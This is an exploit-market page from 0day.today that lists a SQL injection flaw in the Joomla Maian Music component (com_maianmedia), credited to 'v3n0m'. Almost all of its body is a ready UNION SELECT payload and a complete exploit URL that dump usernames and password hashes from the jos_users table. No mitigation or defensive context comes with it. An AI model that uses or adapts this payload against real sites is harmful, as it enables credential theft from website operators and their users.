[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component com_maianmedia SQL Injection Vulnerability

Author
v3n0m
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14876
Category
web applications
Date add
17-11-2010
Platform
php
===========================================================
Joomla Component com_maianmedia SQL Injection Vulnerability
===========================================================

Author      : v3n0m
Site        : http://yogyacarderlink.web.id/
Date        : November, 16-2010
Location    : Jakarta, Indonesia
Time Zone   : GMT +7:00
 
Application : Maian Music
License     : GPLv2
Vendor      : http://www.aretimes.com/
 
Exploit & p0c
_____________
 
-9999+union+all+select+1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+jos_users--
 
http://127.0.0.1/[path]/index.php?option=com_maianmedia&view=music&cat=[SQLi]
http://127.0.0.1/[path]/index.php?option=com_maianmedia&view=music&cat=-9999+union+all+select+1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+jos_users--
 


#  0day.today [2024-07-02]  #